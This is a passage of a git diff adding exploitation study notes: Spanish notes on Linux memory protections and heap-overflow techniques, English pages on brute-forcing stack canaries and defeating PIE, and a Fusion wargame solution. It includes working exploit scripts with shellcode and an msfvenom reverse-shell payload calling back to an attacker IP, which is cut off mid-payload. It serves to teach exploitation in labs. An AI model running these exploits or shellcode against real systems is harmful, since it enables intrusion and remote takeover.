+Esta protección localiza funciones que tengan buffer que puedan ser atacados e incluye en ellas código al ppio de la función para colocar el canario y código al final para comprobarlo.
+
+La función fork\(\) realiza una copia exacta del proceso del padre, por eso mismo si un servidor web llama a fork\(\) se puede hacer un ataque de fuerza bruta byte por byte hasta averiguar el canary que se está utilizando.
+
+Si se usa la función execve\(\) después de fork\(\), se sobreescribe el espacio y el ataque ya no es posible. vfork\(\) permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado.
+
+#### **Relocation Read-Only \(RELRO\)**
+
+Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT.
+
+Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama.
+
+Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa.
+
+Lazy binding —&gt; La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla.
+
+Bind now —&gt; Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro**  y  **-z now**
+
+A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.
+
+**readelf -l /proc/ID\_PROC/exe \| grep BIND\_NOW** —&gt; Para saber si usan el BIND NOW
+
+#### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
+
+Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
+
+Por ej:  
+char buf\[16\];  
+strcpy\(but, source\);
+
+La identifica como insegura y entonces cambia strcpy\(\) por \_\_strcpy\_chk\(\) utilizando el tamaño del buffer como tamaño máximo a copiar.
+
+La diferencia entre **=1**  o **=2** es que:
+
+La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d**
+
+Para mostrar el mensaje de error se usa el argv\[0\], por lo que si se pone en el la dirección de otro sitio \(como una variable global\) el mensaje de error mostrará el contenido de dicha variable. Pag 191
+
+#### **Reemplazo de Libsafe**
+
+Se activa con: LD\_PRELOAD=/lib/libsafe.so.2  
+o  
+“/lib/libsave.so.2” &gt; /etc/ld.so.preload
+
+Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. \(solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid\).
+
+#### **ASCII Armored Address Space**
+
+Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian.
+
+**ret2plt**
+
+Consiste en realiza un ROP de forma que se llame a la función strcpy@plt \(de la plt\) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar \(system\(\)\). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system\(\)… Al final se llama la dirección guardada en GOT que será system\(\)
+
+**Falso EBP**
+
+Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system\(\) se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”.
+
+#### **Jaulas con chroot\(\)**
+
+debootstrap -arch=i386 hardy  /home/user —&gt; Instala un sistema básico bajo un subdirectorio específico
+
+Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd ..
+
+#### **Instrumentación de código**
+
+Valgrind —&gt; Busca errores  
+Memcheck  
+RAD \(Return Address Defender\)  
+Insure++
+
+## **8 Heap Overflows: Exploits básicos**
+
+**Trozo asignado**
+
+prev\_size      \|  
+size                 \|           —Cabecera  
+\*mem \| Datos
+
+**Trozo libre**
+
+prev\_size     \|  
+size                  \|  
+\*fd                   \| Ptr forward chunk  
+\*bk                  \| Ptr back chunk       —Cabecera  
+\*mem \| Datos
+
+Los trozos libres están en una lista doblemente enlazada \(bin\) y nunca pueden haber dos trozos libres juntos \(se juntan\)
+
+En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap\(\) y si el trozo pertenece al arena primario.
+
+Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink\(\) y se pasa el nuevo trozo más grande a frontlink\(\) para que le inserte el bin adecuado.
+
+unlink\(\){  
+BK = P-&gt;bk; —&gt; El BK del nuevo chunk es el que tuviese el que ya estaba libre antes  
+FD = P-&gt;fd; —&gt; El FD del nuevo chunk es el que tuviese el que ya estaba libre antes  
+FD-&gt;bk = BK; —&gt; El BK del siguiente chunk apunta al nuevo chunk  
+BK-&gt;fd = FD; —&gt; El FD del anterior chunk apunta al nuevo chunk  
+}
+
+Por lo tanto si conseguimos modificar el P-&gt;bk con la dirección de un shellcode y el P-&gt;fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
+
+BK = P-&gt;bk = &shellcode  
+FD = P-&gt;fd = &\_\_dtor\_end\_\_ - 12  
+FD-&gt;bk = BK -&gt; \*\(\(&\_\_dtor\_end\_\_ - 12\) + 12\) = &shellcode
+
+Y así se se ejecuta al salir del programa la shellcode.
+
+Además, la 4º sentencia de unlink\(\) escribe algo y la shellcode tiene que estar reparada para esto:
+
+BK-&gt;fd = FD -&gt; \*\(&shellcode + 8\) = \(&\_\_dtor\_end\_\_ - 12\) —&gt; Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
+
+Por lo tanto el exploit se crea:
+
+En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
+
+Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 \(de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre\) y “-4“\(0xfffffffc\) en el size \(para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre\) -&gt; Así cuando free\(\) investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink\(\)**.
+
+Al llamar a unlink\(\) usará como P-&gt;fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12\(pues en FD-&gt;bk le sumará 12 a la dirección guardada en FD\) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode\(P-&gt;bk falso\).
+
+**from struct import \***
+
+**import os**
+
+**shellcode = "\xeb\x0caaaabbbbcccc" \#jm 12 + 12bytes de relleno**
+
+**shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \**
+
+**"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \**
+
+**"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
+
+**prev\_size = pack\("&lt;I”, 0xfffffff0\) \#Interesa que el bit que indica que el anterior trozo está libre esté a 1**
+
+**fake\_size = pack\("&lt;I”, 0xfffffffc\) \#-4, para que piense que el “size” del 3º trozo está 4bytes detrás \(apunta a prev\_size\) pues es ahí donde mira si el 2º trozo está libre**
+
+**addr\_sc = pack\("&lt;I", 0x0804a008 + 8\) \#En el payload al principio le vamos a poner 8bytes de relleno**
+
+**got\_free = pack\("&lt;I", 0x08048300 - 12\) \#Dirección de free\(\) en la plt-12 \(será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free\)**
+
+**payload = "aaaabbbb" + shellcode + "b"\*\(512-len\(shellcode\)-8\) \# Como se dijo el payload comienza con 8 bytes de relleno porque sí**
+
+**payload += prev\_size + fake\_size + got\_free + addr\_sc \#Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12**
+
+**os.system\("./8.3.o " + payload\)**
+
+**unset\(\) liberando en sentido inverso \(wargame\)**
+
+Estamos controlando 3 chunks consecutivos y se liberan en orden inverso al reservado.
+
+En ese caso:
+
+En el chunck c se pone el shellcode
+
+El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre.
+
+Además, se sobreescribe en la cabecera b el size para que valga -4.
+
+Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink\(\) para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink\(\) a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.
+
+De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts\(\)”-12 tenemos nuestro payload.
+
+**Técnica de Frontlink**
+
+Se llama a frontlink cuando se libera algo y ninguno de sus trozos contiguos no son libres, no se llama a unlink\(\) sino que se llama directamente a frontlink\(\).
+
+Vulnerabilidad útil cuando el malloc que se ataca nunca es liberado \(free\(\)\).
+
+Necesita:
+
+Un buffer que pueda desbordarse con la función de entrada de datos
+
+Un buffer contiguo a este que debe ser liberado y al que se le modificará el campo fd de su cabecera gracias al desbordamiento del buffer anterior
+
+Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior
+
+Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este
+
+De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.
+
+**Vulnerabilidad double free\(\)**
+
+Si se llama dos veces a free\(\) con el mismo puntero, quedan dos bins apuntando a la misma dirección.
+
+En caso de querer volver a usar uno se asignaría sin problemas. En caso de querer usar otro, se le asignaría el mismo espacio por lo que tendríamos los punteros “fd” y “bk” falseados con los datos que escribirá la reserva anterior.
+
+**After free\(\)**
+
+Un puntero previamente liberado es usado de nuevo sin control.
+
+## **8 Heap Overflows: Exploits avanzados**
+
+Las técnicas de Unlink\(\) y FrontLink\(\) fueron eliminadas al modificar la función unlink\(\).
+
+#### **The house of mind**
+
+Solo una llamada a free\(\) es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
+
+Una llamada a free\(\) provoca llamar a public\_fREe\(mem\), este hace:
+
+mstate ar\_ptr;
+
+mchunkptr p;
+
+…
+
+p = mem2chunk\(mes\); —&gt; Devuelve un puntero a la dirección donde comienza el trozo \(mem-8\)
+
+…
+
+ar\_ptr = arena\_for\_chunk\(p\); —&gt; chunk\_non\_main\_arena\(ptr\)?heap\_for\_ptr\(ptr\)-&gt;ar\_ptr:&main\_arena \[1\]
+
+…
+
+\_int\_free\(ar\_ptr, mem\);
+
+}
+
+En \[1\] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr\(\) que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes \(en nuestro caso de 0x0804a000 deja 0x08000000\) y accede a 0x08000000-&gt;ar\_ptr \(como si fuese un struct heap\_info\)
+
+De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr\(ptr\)-&gt;ar\_ptr devuelve lo que hemos escrito en 0x08100000 \(pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr\)
+
+De esta forma se llama a \_int\_free\(ar\_ptr, mem\), es decir, **\_int\_free\(0x0804a000, 0x081002a0\)  
+\_int\_free\(mstate av, Void\_t\* mem\){**  
+…  
+bck = unsorted\_chunks\(av\);  
+fwd = bck-&gt;fd;  
+p-&gt;bk = bck;  
+p-&gt;fd = fwd;  
+bck-&gt;fd = p;  
+fwd-&gt;bk = p;
+
+..}
+
+Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
+
+Tal y como se define unsorted\_chunks, sabemos que:  
+bck = &av-&gt;bins\[2\]-8;  
+fwd = bck-&gt;fd = \*\(av-&gt;bins\[2\]\);  
+fwd-&gt;bk = \*\(av-&gt;bins\[2\] + 12\) = p;
+
+Por lo tanto si en av-&gt;bins\[2\] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo.
+
+Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av-&gt;bins\[2\]
+
+En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr\(\) piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av-&gt;bins\[2\]
+
+En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -&gt; NON\_MAIN\_ARENA
+
+A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
+
+De esta forma se llamará a \_int\_free\(TROZO1, TROZO2\) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode.
+
+Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.
+
+Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él.
+
+**Fastbin**
+
+Es una variante de The house of mind
+
+nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free\(\)
+
+fb = &\(av-&gt;fastbins\[fastbin\_index\(size\)\] —&gt; Siendo fastbin\_index\(sz\) —&gt; \(sz &gt;&gt; 3\) - 2
+
+…
+
+p-&gt;fd = \*fb
+
+\*fb = p
+
+De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av-&gt;max\_fast esté en la dirección que vamos a sobreescribir.
+
+Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.
+
+Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —&gt; fastbin\_index\(\) nos devolverá fastbins\[-1\], que apuntará a av-&gt;max\_fast
+
+En este caso av-&gt;max\_fast será la dirección que se sobrescrita \(no a la que apunte, sino esa posición será la que se sobrescrita\).
+
+Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -&gt; Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops\).
+
+Además, ese mismo trozo falso debe ser menor que av-&gt;system\_mem. av-&gt;system\_mem se encuentra 1848 bytes más allá.
+
+Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.
+
+Otra forma de ataque es redirigir el **av** hacia la pila.
+
+Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index\(\) nos devolverá fastbins\[0\] y podemos hacer uso de esto para sobreescribir la pila.
+
+Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
+
+Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av**  es el mutexe que tiene que valer 0.
+
+El **av-&gt;max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
+
+En el **av-&gt;fastbins\[0\]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.
+
+Además, en **av-&gt;system\_mem** \(1484bytes por encima de la posición en la pila\) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.
+
+Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -&gt; Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso\).
+
+**The House of Spirit**
+
+En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante \(por ej, que el puntero esté en el stack debajo de un posible overflow a una variable\).
+
+Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av-&gt;max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc\(\)+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc\(40\), el tamaño del trozo falso debe ser igual a 48.
+
+Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes \(que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size\). Además, la dirección ptr-4+48 debe cumplir varias condiciones \(siendo en este caso ptr=EBP\), es decir, 8 &lt; ptr-4+48 &lt; av-&gt;system\_mem.
+
+En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc\(40\) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.
+
+Esto creo que es porque así cuando lo libere free\(\) guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc\(\) que se quiere reservar, así que le asigna esa dirección.
+
+**The House of Force**
+
+Es necesario:
+
+* Un overflow a un trozo que permita sobreescribir el wilderness
+* Una llamada a malloc\(\) con el tamaño definido por el usuario
+* Una llamada a malloc\(\) cuyos datos puedan ser definidos por el usuario
+
+Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande \(0xffffffff\), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc\(\) sin necesidad de expandir el heap
+
+Lo segundo es alterar el av-&gt;top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av-&gt;top se pondrá &EIP - 8.
+
+Tenemos que sobreescrbir av-&gt;top para que apunte a la zona de memoria bajo el control del atacante:
+
+victim = av-&gt;top;
+
+remainder = chunck\_at\_offset\(victim, nb\);
+
+av-&gt;top = remainder;
+
+Victim recoge el valor de la dirección del trozo wilderness actual \(el actual av-&gt;top\) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc\(\). Por lo que si &EIP-8 está en 0xbffff224 y av-&gt;top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av-&gt;top quede apuntando a $EIP-8 para el próximo malloc\(\) será:
+
+0xbffff224 - 0x080c2788 = 3086207644.
+
+Así se guardará en av-&gt;top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir.
+
+Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc\(\). Es decir, si el wilderness está apuntando a &EIP-8, el size quedará justo en el campo EBP del stack.
+
+**The House of Lore**
+
+**Corrupción SmallBin**
+
+Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
+
+Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av-&gt;max\_fast \(72normalmente\) y menos  a MIN\_LARGE\_SIZE \(512\).
+
+Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
+
+bck = victim-&gt;bk; Apunta al trozo anterior, es la única info que podemos alterar.
+
+bin-&gt;bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección
+
+bck-&gt;fd = bin; Se cierra la lista haciendo que este apunte a bin
+
+Se necesita:
+
+Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin \(es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow\)
+
+Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante.
+
+El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista \(el siguiente en ofrecer\) está en la dirección falsa que hayamos puesto \(al stack o GOT por ejemplo\). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella.
+
+Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin.
+
+Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir.
+
+Así el bin deberá esperar turno a que se llame a malloc\(\) suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa.
+
+Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo \(vulnerabilidad\), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida.
+
+Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck-&gt;fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma \(por el stack probablemente\) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero.
+
+**Corrupción LargeBin**
+
+Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512.
+
+El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc\(\), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea &lt; MINSIZE.
+
+Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 &lt; MINSIZE \(la resta no puede quedar negativa porque se compara un unsigned\)
+
+Además se ha introducido un parche para hacerlo aún más complicado.
+
+**Heap Spraying**
+
+Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops.
+
+**Heap Feng Shui**
+
+Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos.
+
+**objdump -d ejecutable** —&gt; Disas functions  
+**objdump -d ./PROGRAMA \| grep FUNCION** —&gt; Get function address  
+**objdump -d  -Mintel ./shellcodeout** —&gt; Para ver que efectivamente es nuestra shellcode y sacar los OpCodes  
+**objdump -t ./exec \| grep varBss** —&gt; Tabla de símbolos, para sacar address de variables y funciones  
+**objdump -TR ./exec \| grep exit\(func lib\)** —&gt; Para sacar address de funciones de librerías \(GOT\)  
+**objdump -d ./exec \| grep funcCode  
+objdump -s -j .dtors /exec  
+objdump -s -j .got ./exec  
+objdump -t --dynamic-relo ./exec \| grep puts** —&gt; Saca la dirección de puts a sobreescribir en le GOT  
+**objdump -D ./exec** —&gt; Disas ALL hasta las entradas de la plt  
+**objdump -p -/exec  
+Info functions strncmp —&gt;** Info de la función en gdb
+
+## Interesting courses
+
+* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io/)
+* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
+
diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
new file mode 100644
index 00000000..e4f2857c
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
@@ -0,0 +1,90 @@
+# Bypassing Canary & PIE
+
+**If you are facing a binary protected by a canary and PIE \(Position Independent Executable\) you probably need to find a way to bypass them.**
+
+![](../../.gitbook/assets/image%20%28282%29.png)
+
+## Canary
+
+The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it \(network service\), because every time you connect to it **the same canary will be used**.
+
+Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary \(x64\)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server \(another way in **other situation** could be using a **try/except**\):
+
+```python
+from pwn import *
+
+def connect():
+    r = remote("localhost", 8788)
+
+def get_bf(base):
+    canary = ""
+    guess = 0x0
+    base += canary
+
+    while len(canary) < 8:
+        while guess != 0xff:
+            r = connect()
+
+            r.recvuntil("Username: ")
+            r.send(base + chr(guess))
+
+            if "SOME OUTPUT" in r.clean():
+                print "Guessed correct byte:", format(guess, '02x')
+                canary += chr(guess)
+                base += chr(guess)
+                guess = 0x0
+                r.close()
+                break
+            else:
+                guess += 1
+                r.close()
+
+    print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
+    return base
+    
+canary_offset = 1176
+base = "A" * canary_offset
+print("Brute-Forcing canary")
+base_canary = get_bf(base) #Get yunk data + canary
+CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
+```
+
+## PIE
+
+In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.  
+For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes \(x64\) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
+
+To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
+
+```python
+print("Brute-Forcing RBP")
+base_canary_rbp = get_bf(base_canary)
+RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:])
+print("Brute-Forcing RIP")
+base_canary_rbp_rip = get_bf(base_canary_rbp)
+RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
+```
+
+### Get base address
+
+The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
+
+From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
+
+```python
+INI_SHELLCODE = RBP - 1152
+```
+
+From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.  
+To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
+
+![](../../.gitbook/assets/image%20%2818%29.png)
+
+In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf**_ the base address is _0x562002970**000**_
+
+```python
+elf.address = RIP - (RIP & 0xfff)
+```
+
+
+
diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md
new file mode 100644
index 00000000..68ba6530
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/fusion.md
@@ -0,0 +1,63 @@
+# Fusion
+
+## Level00
+
+[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
+
+1. Get offset to modify EIP
+2. Put shellcode address in EIP
+
+```python
+from pwn import *
+
+r = remote("192.168.85.181", 20000)
+
+buf = "GET "            # Needed
+buf += "A"*139          # Offset 139
+buf += p32(0xbffff440)  # Stack address where the shellcode will be saved
+buf += " HTTP/1.1"      # Needed
+buf += "\x90"*100       # NOPs
+
+#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
+buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
+buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
+buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
+buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
+buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
+buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
+buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
